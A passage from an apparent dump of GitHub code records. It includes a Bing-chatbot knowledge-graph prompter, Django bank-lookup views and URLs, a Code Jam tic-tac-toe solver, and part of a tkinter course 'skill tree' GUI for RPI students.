print('make dir: ' + path)\n os.makedirs(path)\n \n def save_to_file(self, path, data):\n with open(path, 'w', encoding='utf-8') as f:\n f.write(data)\n \n \nclass DialogueHandler:\n def __init__(self, args):\n # flags\n self.file_hundler = FileHandler(args=args)\n \n self.finish_asking_node = False\n self.ask_node_once = False\n self.finish_asking_edge = False\n self.ask_edge_once = False\n self.finish_asking_node_info = False\n self.ask_node_info_once = False\n self.finish_asking_node_group = False\n self.ask_node_group_once = False\n self.finish_asking_node_importance = False\n self.ask_node_importance_once = False\n \n \n # self.finish_asking_edge_info = False\n # self.ask_edge_info_once = False\n \n if args.lang == 'ja':\n self.scripts = {\n 'ask_prefix':'についての知識グラフを作成したいです.',\n 'ask_node':'知識グラフに現れるノードを出力してください.',\n 'ask_edge':'知識グラフに現れるエッジを出力してください.',\n 'ask_node_info':'ノードの情報を出力してください.',\n 'ask_node_group':'教えていただいたノードをいくつかのグループに分けてください.',\n 'ask_node_importance':'ノードの重要度を0.0から1.0の間で教えてください.',\n 'ask_tail':'以下の形式で出力してください.\\n',\n 'ask_again':'指定した形式で出力しなおしてください.\\n',\n 'ask_node_eg':\"例'''\\n- 桃太郎\\n- サル\\n- 犬\\n'''\",\n 'ask_edge_eg':\"例'''\\n- 桃太郎, 仲間にする, サル\\n- 桃太郎, 仲間にする, 犬\\n'''\",\n 'ask_node_info_eg':\"例'''\\n- 桃太郎:桃から生まれた主人公.鬼を退治しに鬼ヶ島に向かう.\\n'''\",\n 'ask_node_group_eg':\"例'''\\n- 桃太郎:仲間\\n- サル:仲間\\n- 鬼:敵\\n'''\",\n 'ask_node_importance_eg':\"例'''\\n- 桃太郎:0.5\\n- サル:0.5\\n- 鬼:0.0\\n'''\",\n }\n elif args.lang == 'en':\n self.scripts = {\n 'ask_prefix':'I want to make a knowledge graph about ',\n 'ask_node':'Please output the nodes that appear in the knowledge graph as much as possible',\n 'ask_edge':'Please output the edges that appear in the knowledge graph.',\n 'ask_node_info':'Please output the information of the node.',\n 'ask_node_group':'Please divide the nodes you taught into some groups.',\n 'ask_node_importance':'Please tell me the importance of the node between 0.0 and 1.0.',\n 'ask_tail':'Please output in the following format.\\n',\n 'ask_again':'Please output again in the specified format.\\n',\n 'ask_node_eg':\"Example\\n'''\\n- Momotaro\\n- Monkey\\n- Dog\\n'''\",\n 'ask_edge_eg':\"Example\\n'''\\n- Momotaro, make friends, Monkey\\n- Momotaro, make friends, Dog\\n'''\",\n 'ask_node_info_eg':\"Example\\n'''\\n- Momotaro: The main character born from a peach. He goes to Onigashima to defeat the demon.\\n'''\",\n 'ask_node_group_eg':\"Example\\n'''\\n- Momotaro:Friends\\n- Monkey:Friends\\n- Demon:Enemy\\n'''\",\n 'ask_node_importance_eg':\"Example\\n'''\\n- Momotaro:0.5\\n- Monkey:0.5\\n- Demon:0.0\\n'''\",\n }\n \n def whether_Prompter_ask_node_correctly(self, output_text_from_bot):\n self.ask_node_once = True\n correct_pattern = r'^-\\s(.+)$'\n ans = re.findall(correct_pattern, output_text_from_bot, re.MULTILINE)\n if ans != []:\n self.finish_asking_node = True\n path = self.file_hundler.file_dir + 'node.txt'\n self.file_hundler.save_to_file(path, output_text_from_bot)\n return ans\n \n def whether_Prompter_ask_edge_correctly(self, output_text_from_bot):\n self.ask_edge_info_once = True\n correct_pattern = r'^-\\s(.+)$'\n ans = re.findall(correct_pattern, output_text_from_bot, re.MULTILINE)\n if ans:\n self.finish_asking_edge = True\n path = self.file_hundler.file_dir + 'edge.txt'\n self.file_hundler.save_to_file(path, output_text_from_bot)\n return ans\n \n def whether_Prompter_ask_node_info_correctly(self, output_text_from_bot):\n self.ask_node_info_once = True\n correct_pattern = r'^-\\s(.+):(.+)$'\n ans = re.findall(correct_pattern, output_text_from_bot, re.MULTILINE)\n if ans:\n self.finish_asking_node_info = True\n path = self.file_hundler.file_dir + 'node_info.txt'\n self.file_hundler.save_to_file(path, output_text_from_bot)\n return ans\n \n def whether_Prompter_ask_node_group_correctly(self, output_text_from_bot):\n self.ask_node_group_once = True\n correct_pattern = r'^-\\s(.+):(.+)$'\n ans = re.findall(correct_pattern, output_text_from_bot, re.MULTILINE)\n if ans:\n self.finish_asking_node_group = True\n path = self.file_hundler.file_dir + 'node_group.txt'\n self.file_hundler.save_to_file(path, output_text_from_bot)\n return ans\n \n def whether_Prompter_ask_node_importance_correctly(self, output_text_from_bot):\n self.ask_node_importance_once = True\n correct_pattern = r'^-\\s(.+):(.+)$'\n ans = re.findall(correct_pattern, output_text_from_bot, re.MULTILINE)\n if ans:\n self.finish_asking_node_importance = True\n path = self.file_hundler.file_dir + 'node_importance.txt'\n self.file_hundler.save_to_file(path, output_text_from_bot)\n return ans\n \n # def whether_Prompter_ask_edge_info_correctly(self, output_text_from_bot):\n # self.ask_edge_info_once = True\n # correct_pattern\n \n \n def return_next_prompt(self, output_text_from_bot=None, title=None):\n \n # nodeについての質問作成部分\n if self.finish_asking_node == False:\n if self.ask_node_once == False: # 初めの質問\n self.ask_node_once = True\n return title + self.scripts['ask_prefix'] + self.scripts['ask_node'] + self.scripts['ask_tail'] + self.scripts['ask_node_eg']\n self.whether_Prompter_ask_node_correctly(output_text_from_bot)\n if self.ask_node_once == True and self.finish_asking_node == False: # node一覧について聞き直す\n return self.scripts['ask_again'] + self.scripts['ask_node_eg']\n \n # edgeについての質問作成部分\n if self.finish_asking_node == True and self.finish_asking_edge == False:\n if self.ask_edge_once == False: # edgeについて初めての質問\n self.ask_edge_once = True\n return title + self.scripts['ask_prefix'] + self.scripts['ask_edge'] + self.scripts['ask_tail'] + self.scripts['ask_edge_eg']\n self.whether_Prompter_ask_edge_correctly(output_text_from_bot)\n if self.ask_edge_once == True and self.finish_asking_edge == False:\n return self.scripts['ask_again'] + self.scripts['ask_edge_eg']\n \n # node_infoについての質問作成部分\n if self.finish_asking_node == True and self.finish_asking_edge == True and self.finish_asking_node_info == False:\n if self.ask_node_info_once == False:\n self.ask_node_info_once = True\n return title + self.scripts['ask_prefix'] + self.scripts['ask_node_info'] + self.scripts['ask_tail'] + self.scripts['ask_node_info_eg'] # node_infoについて初めての質問\n self.whether_Prompter_ask_node_info_correctly(output_text_from_bot)\n if self.ask_node_info_once == True and self.finish_asking_node_info == False:\n return self.scripts['ask_again'] + self.scripts['ask_node_info_eg']\n \n # node_groupについての質問作成部分\n if self.finish_asking_node == True and self.finish_asking_edge == True and self.finish_asking_node_info == True and self.finish_asking_node_group == False:\n if self.ask_node_group_once == False:\n self.ask_node_group_once = True\n return title + self.scripts['ask_prefix'] + self.scripts['ask_node_group'] + self.scripts['ask_tail'] + self.scripts['ask_node_group_eg'] # node_groupについて初めての質問\n self.whether_Prompter_ask_node_group_correctly(output_text_from_bot)\n if self.ask_node_group_once == True and self.finish_asking_node_group == False:\n return self.scripts['ask_again'] + self.scripts['ask_node_group_eg']\n \n # node_importanceについての質問作成部分\n if self.finish_asking_node == True and self.finish_asking_edge == True and self.finish_asking_node_info == True and self.finish_asking_node_group == True and self.finish_asking_node_importance == False:\n if self.ask_node_importance_once == False:\n self.ask_node_importance_once = True\n return title + self.scripts['ask_prefix'] + self.scripts['ask_node_importance'] + self.scripts['ask_tail'] + self.scripts['ask_node_importance_eg'] # node_importanceについて初めての質問\n self.whether_Prompter_ask_node_importance_correctly(output_text_from_bot)\n if self.ask_node_importance_once == True and self.finish_asking_node_importance == False:\n return self.scripts['ask_again'] + self.scripts['ask_node_importance_eg'] \n \n return 'everything is finished.'\n \n \n \n \nclass ChatbotPrompter:\n def __init__(self, args):\n if args.title is None:\n self.title = input(\"Enter title: \")\n else:\n self.title = args.title\n \n self.dialogue_handler = DialogueHandler(args)\n \n async def main(self):\n script_dir = os.path.dirname(os.path.abspath(__file__))\n cookie_path = os.path.join(script_dir, 'bing_cookies_.json')\n cookies = json.loads(open(cookie_path, encoding=\"utf-8\").read())\n bot = await Chatbot.create(cookies=cookies)\n \n prompt = self.dialogue_handler.return_next_prompt(title=self.title)\n response = await bot.ask(prompt=prompt, conversation_style=ConversationStyle.creative, simplify_response=True)\n print(response['text'])\n \n while True:\n prompt = self.dialogue_handler.return_next_prompt(response['text'], self.title)\n if prompt == 'everything is finished.':\n break\n response = await bot.ask(prompt=prompt, conversation_style=ConversationStyle.creative, simplify_response=True)\n print(response['text'])\n await bot.close()\n\nif __name__ == \"__main__\":\n bot = ChatbotPrompter(\"三匹の子豚\")\n asyncio.run(bot.main())","repo_name":"u109755b/mm-enshu-2023","sub_path":"mm_enshu_2023_download.py","file_name":"mm_enshu_2023_download.py","file_ext":"py","file_size_in_byte":11854,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"29543997145","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom .models import banks, bank_branches\nfrom .forms import IFSCForm, BANKSForm\n\ndef index(request): \n if request.method == \"GET\": \n return render(request, \"index.html\" , {\"result\": False})\n \n elif request.method == \"POST\":\n if request.POST.dict()[\"FORMNAME\"] == \"IFSC\":\n form1 = IFSCForm(request.POST)\n \n if form1.is_valid():\n num = form1.cleaned_data['IFSC']\n num = str(num).upper()\n details = bank_branches.objects.filter(ifsc=num)\n if(len(details) != 0):\n return render(request, \"index.html\" , {\"query_results\":details, \"result\": True})\n return render(request, \"index.html\", {\"result\": False})\n \n elif request.POST.dict()[\"FORMNAME\"] == \"BANK\":\n form1 = BANKSForm(request.POST)\n if form1.is_valid():\n bname = form1.cleaned_data[\"BANKNAME\"]\n cityname = form1.cleaned_data[\"CITYNAME\"]\n bname = str(bname).upper()\n cityname = str(cityname).upper()\n details = bank_branches.objects.filter(bank_name = bname, city = cityname)\n if(len(details) != 0):\n return render(request, \"index.html\" , {\"query_results\":details, \"result\": True})\n return render(request, \"index.html\", {\"result\": False})\n \n \ndef load_dataset(request):\n return HttpResponse(\"loaded\")\n","repo_name":"rupanshugoyal/Credicxobank","sub_path":"banks/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13015994369","text":"__author__ = 'spencertank'\nfrom django.conf.urls import patterns, url, include\nfrom rest_framework import routers\nfrom home import views\n\nrouter = routers.DefaultRouter()\nrouter.register(r'users', views.UserViewSet)\nrouter.register(r'groups', views.GroupViewSet)\nrouter.register(r'teams', views.TeamViewSet)\nrouter.register(r'stadiums', views.StadiumViewSet)\n\nurlpatterns = patterns('',\n url(r'^$', views.base, name='base'),\n url(r'^api/', include(router.urls)),\n url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework'))\n\n)","repo_name":"Sktank/Worldcup","sub_path":"home/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23384747311","text":"def testLine(fourCharacters):\r\n if all([character == \"X\" or character == \"T\" for character in fourCharacters]):\r\n return \"X\"\r\n if all([character == \"O\" or character == \"T\" for character in fourCharacters]):\r\n return \"O\"\r\n else:\r\n return False\r\n\r\ninputFile = open(\"A-small-attempt1.in\", \"r\")\r\n#inputFile = open(\"QualificationAsmall.in\", \"r\")\r\n\r\noutputFile = open(\"QualificationAsmall.txt\", \"w\")\r\n\r\ncases = int(inputFile.readline().strip())\r\nboards = inputFile.read().split(\"\\n\\n\")\r\nfor caseIndex in range(1, cases + 1):\r\n finalResult = \"\"\r\n currentBoard = boards[caseIndex - 1].split(\"\\n\")\r\n for lineIndex in range(4):\r\n result = testLine(currentBoard[lineIndex])\r\n if result:\r\n finalResult = \"%s won\" % result\r\n\r\n result = testLine([currentBoard[line][lineIndex] for line in range(4)])\r\n if result:\r\n finalResult = \"%s won\" % result\r\n\r\n result = testLine([currentBoard[index][index] for index in range(4)])\r\n if result:\r\n finalResult = \"%s won\" % result\r\n result = testLine([currentBoard[index][3 - index] for index in range(4)])\r\n if result:\r\n finalResult = \"%s won\" % result\r\n\r\n if not finalResult:\r\n if all([\".\" not in line for line in currentBoard]):\r\n finalResult = \"Draw\"\r\n else:\r\n finalResult = \"Game has not completed\"\r\n outputFile.write(\"Case #%d: %s\\n\" % (caseIndex, finalResult))\r\n\r\ninputFile.close()\r\noutputFile.close()\r\n\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_116/671.py","file_name":"671.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15887951217","text":"# -*- encoding:utf-8 -*-\n# Dependencies\nfrom tkinter import *\n\nfrom PIL import Image, ImageTk\n\nfrom basicClasses.InfoGatherer import InfoGatherer\n\nTEAM_SLOGAN_STR = \"RPI YOUR OWN ADVENTURE\"\ncourse_list = []\n\n\nclass UserTypeEnum(enum.Enum):\n \"\"\"\n The Class for representing the user Types\n \"\"\"\n STUDENT = \"STUDENT\"\n GUEST = \"GUEST\"\n\n\nclass pageEnum(enum.Enum):\n \"\"\"\n The class for representing the current page\n \"\"\"\n loginWindow = \"loginWindow\"\n mainWindow = \"mainWindow\"\n AddSkillPage = \"AddSkillPage\"\n requestWindow = \"requestWindow\"\n extraWindow = \"extraWindow\"\n\n\nclass loginWindow:\n \"\"\"\n This is the page for user login / Guest mode selection\n \"\"\"\n\n def __init__(self, master):\n \"\"\"\n :param master: the tkinter instance used to initialize the page\n \"\"\"\n self.master = master\n # Data segment\n self.user_type = None\n self.gatherer = None\n self.RIN = None\n self.password = None\n self.next = None\n self.page_name = pageEnum.loginWindow\n \"\"\"\n define logo title and window dimension\n \"\"\"\n self.img = PhotoImage(file='src/rpi.gif')\n self.label_img = Label(self.master, image=self.img)\n self.label_img.pack()\n self.screen_width = self.master.maxsize()[0]\n self.screen_height = self.master.maxsize()[1]\n self.w = int((self.screen_width - 600) / 2)\n self.h = int((self.screen_height - 400) / 2)\n self.master.geometry(f'600x400+{self.w}+{self.h}')\n self.master.resizable(width=False, height=False)\n self.master.title(TEAM_SLOGAN_STR)\n\n self.RIN_label = Label(self.master, width=7, text='RIN', compound='center')\n self.RIN_label.place(x=200, y=120)\n self.password_label = Label(self.master, width=7, text='Password: ', compound='center')\n self.password_label.place(x=200, y=120 + 40)\n\n RIN = StringVar\n password = StringVar\n\n self.RIN_entry = Entry(self.master, textvariable=RIN, bg='yellow')\n self.RIN_entry.pack()\n self.RIN_entry.place(x=280, y=80 + 40)\n\n self.Password_entry = Entry(self.master, textvariable=password, show='*', bg='yellow')\n self.Password_entry.pack()\n self.Password_entry.place(x=280, y=120 + 40)\n\n self.loginButton = Button(self.master, text=\"Login in as RPI student\", width=20, compound='center',\n command=lambda: self.check_password(),\n fg='black', bg='yellow')\n self.loginButton.pack()\n self.loginButton.place(x=150, y=150 + 40)\n self.guestButton = Button(self.master, text=\"Guest Mode\", width=15, compound='center',\n command=lambda: self.guest_mode(), fg='black', bg='yellow')\n self.guestButton.pack()\n self.guestButton.place(x=350, y=150 + 40)\n\n def check_password(self):\n \"\"\"\n This function checks the set username and password and set the logged_in status accordingly\n \"\"\"\n self.master.title(\"Logging in, please wait\")\n self.RIN = self.RIN_entry.get()\n self.password = self.Password_entry.get()\n if self.RIN is None or self.password is None or len(self.RIN) == 0 or len(self.password) == 0:\n self.master.title(\"Please enter the username/password to continue\")\n return\n self.gatherer = InfoGatherer(rin=self.RIN_entry.get(), password=self.Password_entry.get())\n if self.gatherer.logged_in:\n self.user_type = UserTypeEnum.STUDENT\n self.goNext()\n else:\n self.master.title(\"Failed to log in, please retry.\")\n\n def goNext(self):\n \"\"\"\n Initialize and assign the next page to te current variable\n \"\"\"\n self.master.quit()\n # self.master = Tk()\n self.label_img.destroy()\n self.next = mainWindow(self.master)\n self.master.mainloop()\n\n def guest_mode(self):\n \"\"\"\n Start as guest (no skillTreeNode, an empty Tree is initialized)\n \"\"\"\n self.user_type = UserTypeEnum.GUEST\n self.goNext()\n\n\nclass mainWindow:\n \"\"\"\n This is the main page that shows the skill tree, the requests and the available options\n \"\"\"\n\n def __init__(self, master):\n \"\"\"\n :param master: the tkinter instance used to initialize the page\n \"\"\"\n # Data segment\n self.page_name = pageEnum.mainWindow\n self.sub_page_name = None\n self.sub_page_window = None\n self.PersonObj = None\n self.user_type = None\n self.ST = None\n self.gatherer = None\n self.show_skill_flag = False\n self.accept_list = None\n\n # Skill Tree Diagram\n resize_img = Image.open(\"src/skillTreeDiagramPlaceHolder.png\").resize((800, 570))\n self.master = master\n self.screen_width, self.screen_height = self.master.maxsize()\n self.w = int((self.screen_width - 1200) / 2)\n self.h = int((self.screen_height - 800) / 2)\n self.master.geometry(f'1200x800+{self.w}+{self.h}')\n self.master.resizable(width=True, height=True)\n self.master.title(TEAM_SLOGAN_STR)\n\n self.skillFrame = LabelFrame(self.master, text=\"Skill Tree Diagram: \", padx=10, pady=12, font=(\"Georgia\", 20))\n self.skillFrame.pack()\n self.skillImg = ImageTk.PhotoImage(resize_img)\n self.label1 = Label(self.skillFrame, image=self.skillImg)\n self.label1.pack()\n self.skillFrame.place(x=0, y=0)\n\n # Request List\n self.requestFrame = LabelFrame(self.master, text=\"Request List: \", font=(\"Georgia\", 20))\n self.requestFrame.pack()\n self.request_data = StringVar()\n self.requestList = Listbox(self.requestFrame, width=40, height=37, listvariable=self.request_data)\n self.requestList.pack()\n self.requestFrame.place(x=840, y=0)\n\n # this is a button sample background\n self.buttonImg = PhotoImage(file=\"src/buttonSample.png\")\n self.buttonImg = self.buttonImg.subsample(2, 2)\n\n # Add/remove button\n self.add_or_remove = Button(\n self.master,\n text=\"Add/Remove From SIS\",\n compound='center',\n font=\"arial 10\",\n fg=\"black\",\n bd=0,\n command=lambda: self.addOrRemove()\n )\n self.add_or_remove.config(image=self.buttonImg)\n self.add_or_remove.pack()\n self.add_or_remove.place(x=75, y=650)\n\n # show skill tree button\n self.show = Button(\n self.master,\n text=\"Show Skill Tree\",\n compound='center',\n font=\"arial 10\",\n fg=\"black\",\n bd=0,\n command=lambda: self.show_skill()\n )\n self.show.config(image=self.buttonImg)\n self.show.pack()\n self.show.place(x=325, y=650)\n\n # Add extracurricular button\n self.Add_Extra = Button(\n self.master,\n text=\"Add extracurricular\",\n compound='center',\n font=\"arial 10\",\n fg=\"black\",\n bd=0,\n command=lambda: self.extra()\n )\n self.Add_Extra.config(image=self.buttonImg)\n self.Add_Extra.pack()\n self.Add_Extra.place(x=575, y=650)\n\n # Modify requests button\n self.modify_request = Button(\n self.master,\n text=\"Modify requests\",\n compound='center',\n font=\"arial 10\",\n fg=\"black\",\n bd=0,\n command=lambda: self.ModifyQuest()\n )\n self.modify_request.config(image=self.buttonImg)\n self.modify_request.pack()\n self.modify_request.place(x=825, y=650)\n\n def Update_skilltree(self):\n \"\"\"\n Reload the skillTree image from stored path\n \"\"\"\n resize_img = Image.open('pic_save/temp_fig.png').resize((620, 348))\n self.skillImg = ImageTk.PhotoImage(resize_img)\n self.label1 = Label(self.master, image=self.skillImg)\n self.label1.pack()\n self.label1.place(x=70, y=50)\n\n def extra(self):\n self.go_extra_page()\n\n def go_extra_page(self):\n \"\"\"\n Initialize and go into extracurricular page\n \"\"\"\n self.sub_page_name = pageEnum.extraWindow\n self.master.deiconify()\n new_window = Toplevel(self.master)\n self.sub_page_window = new_window\n extrapage(new_window, personObj=self.PersonObj, st=self.ST, parent=self)\n new_window.mainloop()\n\n def addOrRemove(self):\n \"\"\"\n Switch to the add/remove page\n \"\"\"\n self.goto_add_remove_page()\n\n def show_skill(self):\n \"\"\"\n Show the skillTree in a separate window\n \"\"\"\n self.show_skill_flag = True\n\n def goto_add_remove_page(self):\n \"\"\"\n Initialize and show the add/remove page\n \"\"\"\n self.sub_page_name = pageEnum.AddSkillPage\n self.master.deiconify()\n new_window = Toplevel(self.master)\n AddSkillPage(new_window, personObj=self.PersonObj, st=self.ST, parent=self)\n self.sub_page_window = new_window\n new_window.mainloop()\n\n def ModifyQuest(self):\n \"\"\"\n Goto the request modification page\n \"\"\"\n self.goto_modify_request_page()\n\n def goto_modify_request_page(self):\n \"\"\"\n Initialize the request page and then show it\n \"\"\"\n self.master.deiconify()\n newwindow = Toplevel(self.master)\n request = requestWindow(newwindow, personObj=self.PersonObj)\n self.master.wait_window(newwindow)\n self.accept_list = request.return_list()\n self.request_data.set(self.accept_list)\n\n\nclass extrapage:\n def __init__(self, master, personObj=None, st=None, parent=None):\n self.master = master\n self.screen_width, self.screen_height = self.master.maxsize()\n self.w = int((self.screen_width - 800) / 2)\n self.h = int((self.screen_height - 600) / 2)\n self.master.geometry(f'800x600+{self.w}+{self.h}')\n self.master.resizable(width=False, height=False)\n # Course List\n\n # ###################################################################################\n self.PersonObj = personObj\n self.ST = st\n self.parent = parent\n # Listbox representation for displaying the added/available courses\n self.courseList_listbox = None\n self.addedList_listbox = None\n # Data representation for the course/added list as dict\n self.course_dict = None\n # Temp list for addition\n self.course_list = None\n self.added_list = None\n\n self.course_dict = dict()\n self.course_list = []\n self.added_list = []\n\n if self.PersonObj is not None:\n # Update the selectable courses\n for item in self.PersonObj.get_selectable_courses(self.ST):\n self.course_list.append(str(item))\n self.course_dict[str(item)] = item\n # Update the selected courses\n for course in self.PersonObj.get_skills():\n self.added_list.append(str(course))\n else:\n self.course_list = ['mock list', 'Operating System', 'Principle of Software', 'Intro to algorithm']\n for item in self.course_list:\n self.course_dict[item] = item\n\n # self.courseframe=LabelFrame(self.master, text=\"Course List: \", font=(\"Georgia\", 20))\n # self.courseframe.pack(side=TOP)\n self.course_data = StringVar()\n self.courseList = Listbox(self.master, height=30, width=50, listvariable=self.course_data,\n selectmode='multiple')\n\n # print(self.added_list)\n\n for course in self.added_list:\n self.courseList.insert(END, course)\n\n self.courseList.pack()\n self.courseList.place(x=10, y=10)\n # Extra course\n self.extra_course = StringVar()\n self.extra_entry = Entry(self.master, textvariable=self.extra_course)\n self.extra_entry.insert(0, \"Enter Course here\")\n self.extra_entry.pack()\n self.extra_entry.place(x=500, y=150, width=150, height=50)\n\n # this is a button sample background\n self.buttonImg = PhotoImage(file=\"src/buttonSample.png\")\n self.buttonImg = self.buttonImg.subsample(2, 2)\n # Add button\n self.addExtra = Button(\n self.master,\n text=\"Add\",\n compound='center',\n font=\"arial 10\",\n fg=\"black\",\n bd=0,\n command=lambda: self.add()\n )\n self.addExtra.config(image=self.buttonImg)\n self.addExtra.pack()\n self.addExtra.place(x=500, y=200, width=150, height=50)\n\n def add(self):\n # print(self.extra_entry.get())\n this_input = str(self.extra_entry.get())\n selected_course_index = []\n if this_input == \"Enter Course here\" or this_input == \"\":\n return\n try:\n selected_course_index = self.courseList.curselection()\n # print(selected_course_index)\n except:\n return\n selected_course = [self.ST.get_node_by_shortName(self.courseList.get(index)) for index in selected_course_index]\n this_skill = self.ST.add_custom_skill(skill_name=this_input, parent=selected_course)\n self.PersonObj.add_skill(self.ST, this_skill)\n\n self.go_back()\n\n def go_back(self):\n self.parent.sub_page_name = None\n self.parent.sub_page_window = None\n self.master.destroy()\n\n\nclass AddSkillPage:\n \"\"\"\n This is the page that allows you modify your skill tree via SIS\n \"\"\"\n\n def __init__(self, master, personObj=None, st=None, parent=None):\n \"\"\"\n :param master: the tkinter instance used to initialize the page\n :param personObj: the Person class instance used to store user info\n :param st: the SkillTree instance for fetching the courses\n :param parent: the parent page of the current page\n \"\"\"\n self.course = Label(master, width=20, text='CourseList', compound='center', font=(\"Georgia\", 25))\n self.course.place(x=0, y=0)\n self.added = Label(master, width=20, text='Added courses', compound='center', font=(\"Georgia\", 25))\n self.added.place(x=350, y=0)\n # Data segment\n self.page_name = pageEnum.AddSkillPage\n self.PersonObj = personObj\n self.ST = st\n self.parent = parent\n # Listbox representation for displaying the added/available courses\n self.courseList_listbox = None\n self.addedList_listbox = None\n # Data representation for the course/added list as dict\n self.course_dict = None\n # Temp list for addition\n self.course_list = None\n self.added_list = None\n\n self.master = master\n self.screen_width, self.screen_height = self.master.maxsize()\n self.w = int((self.screen_width - 1200) / 2)\n self.h = int((self.screen_height - 800) / 2)\n self.master.geometry(f'1200x800+{self.w}+{self.h}')\n self.master.resizable(width=False, height=False)\n\n # Set up the status bar\n self.statusBar = StringVar()\n self.statusBar.set(\"Ready\")\n self.console = Label(self.master, textvariable=self.statusBar, height=3, relief=SUNKEN, anchor=\"w\")\n self.console.pack(side=BOTTOM, fill=X)\n\n # Set up the course list\n self.courseList_listbox = Listbox(self.master, width=35, height=35)\n # Available course list:\n self.course_dict = dict()\n self.course_list = []\n self.added_list = []\n\n if self.PersonObj is not None:\n # Update the selectable courses\n for item in self.PersonObj.get_selectable_courses(self.ST):\n self.course_list.append(str(item))\n self.course_dict[str(item)] = item\n # Update the selected courses\n for course in self.PersonObj.get_skills():\n self.added_list.append(str(course))\n self.course_dict[str(course)] = course\n else:\n self.course_list = ['mock list', 'Operating System', 'Principle of Software', 'Intro to algorithm']\n for item in self.course_list:\n self.course_dict[item] = item\n\n self.course_list.sort()\n self.added_list.sort()\n\n # Show the selectable course in a list\n for item in self.course_list:\n if item not in self.added_list and item.lower() != \"root\":\n self.courseList_listbox.insert(END, item)\n self.courseList_listbox.pack()\n self.courseList_listbox.place(x=100, y=50)\n\n # Show the added course in a list\n self.addedList_listbox = Listbox(self.master, width=35, height=35)\n for course in self.added_list:\n self.addedList_listbox.insert(END, course)\n self.addedList_listbox.pack()\n self.addedList_listbox.place(x=450, y=50)\n\n # this is a button sample background\n self.buttonImg = PhotoImage(file=\"src/buttonSample.png\")\n self.buttonImg = self.buttonImg.subsample(2, 2)\n\n # # entry for potential added course\n # self.potentialCourseName = StringVar\n # self.entryPotentialCourse = Entry(self.master, textvariable=self.potentialCourseName)\n # self.entryPotentialCourse.insert(0, \"Enter course name\")\n # self.entryPotentialCourse.pack()\n # self.entryPotentialCourse.place(x=750, y=50, width=150, height=50)\n\n # Add button\n self.add = Button(\n self.master,\n text=\"Add\",\n compound='center',\n font=\"arial 10\",\n fg=\"black\",\n bd=0,\n command=lambda: self.just_add()\n )\n self.add.config(image=self.buttonImg)\n self.add.pack()\n self.add.place(x=740, y=110)\n\n # remove button\n self.remove = Button(\n self.master,\n text=\"Remove\",\n compound='center',\n font=\"arial 10\",\n fg=\"black\",\n bd=0,\n command=lambda: self.just_remove()\n )\n self.remove.config(image=self.buttonImg)\n self.remove.pack()\n self.remove.place(x=740, y=180)\n\n # entry for CRN input\n self.CRN_num = StringVar\n self.entryCRN = Entry(self.master, textvariable=self.CRN_num)\n self.entryCRN.insert(0, \"Enter CRN here\")\n self.entryCRN.pack()\n self.entryCRN.place(x=750, y=280, width=150, height=50)\n\n # another add course button\n self.addByCRN = Button(\n self.master,\n text=\"Add by CRN\",\n compound='center',\n font=\"arial 10\",\n fg=\"black\",\n bd=0,\n command=lambda: self.add_CRN()\n )\n self.addByCRN.config(image=self.buttonImg)\n self.addByCRN.pack()\n self.addByCRN.place(x=740, y=330)\n\n # entry for filter\n self.filter_text = StringVar\n self.Filter = Entry(self.master, textvariable=self.filter_text)\n self.Filter.insert(0, \"Enter Text here\")\n self.Filter.pack()\n self.Filter.place(x=750, y=430, width=150, height=50)\n\n # apply button\n self.Apply = Button(\n self.master,\n text=\"Apply Filter\",\n compound='center',\n font=\"arial 10\",\n fg=\"black\",\n bd=0,\n command=lambda: self.filter()\n )\n self.Apply.config(image=self.buttonImg)\n self.Apply.pack()\n self.Apply.place(x=740, y=480)\n\n # go back button\n self.back = Button(\n self.master,\n text=\"Go Back\",\n compound='center',\n font=\"arial 10\",\n fg=\"black\",\n bd=0,\n command=lambda: self.goBack()\n )\n self.back.config(image=self.buttonImg)\n self.back.pack()\n self.back.place(x=740, y=550)\n\n def just_add(self):\n \"\"\"\n Add the selected course from the list to the user skillTree, if nothing is selected, return\n \"\"\"\n self.statusBar.set(\"Adding course........\")\n self.console.update()\n try:\n if self.courseList_listbox.curselection()[0] is not None and self.courseList_listbox.curselection()[0] >= 0:\n # Get selection and add the skill\n selected = self.courseList_listbox.get(self.courseList_listbox.curselection())\n self.PersonObj.add_skill(self.ST, self.course_dict[selected])\n self.courseList_listbox.delete(self.courseList_listbox.curselection())\n self.course_list.remove(str(self.course_dict[selected]))\n # Update the added skill\n self.addedList_listbox.insert(END, str(self.course_dict[selected]))\n self.added_list.append(str(self.course_dict[selected]))\n self.statusBar.set(\"Added {}\".format(selected))\n self.console.update()\n\n # Try to add to SIS if logged in\n if self.parent.user_type == UserTypeEnum.STUDENT:\n self.parent.gatherer.add_course_from_SIS()\n except IndexError:\n self.statusBar.set(\"No course selected.\")\n self.console.update()\n\n def just_remove(self):\n \"\"\"\n Remove the selected course from the added list, if nothing is selected, return\n \"\"\"\n self.statusBar.set(\"Removing course........\")\n self.console.update()\n try:\n # print(self.addedList_listbox.curselection()[0])\n if self.addedList_listbox.curselection()[0] is not None and self.addedList_listbox.curselection()[0] >= 0:\n # Get selection and remove the skill\n selected = self.addedList_listbox.get(self.addedList_listbox.curselection())\n self.PersonObj.remove_skill(self.ST, self.course_dict[selected])\n self.addedList_listbox.delete(self.addedList_listbox.curselection())\n self.added_list.remove(str(self.course_dict[selected]))\n # Update the available skills\n self.courseList_listbox.insert(END, str(self.course_dict[selected]))\n self.course_list.append(str(self.course_dict[selected]))\n self.statusBar.set(\"Removed {}\".format(selected))\n self.console.update()\n\n # Try to remove from SIS if logged in\n if self.parent.user_type == UserTypeEnum.STUDENT:\n self.parent.gatherer.remove_course_from_SIS()\n except IndexError:\n self.statusBar.set(\"No course selected.\")\n self.console.update()\n\n def add_CRN(self):\n \"\"\"\n Add the course by the CRN input, hint when necessary\n \"\"\"\n self.statusBar.set(\"Busy!!! Adding 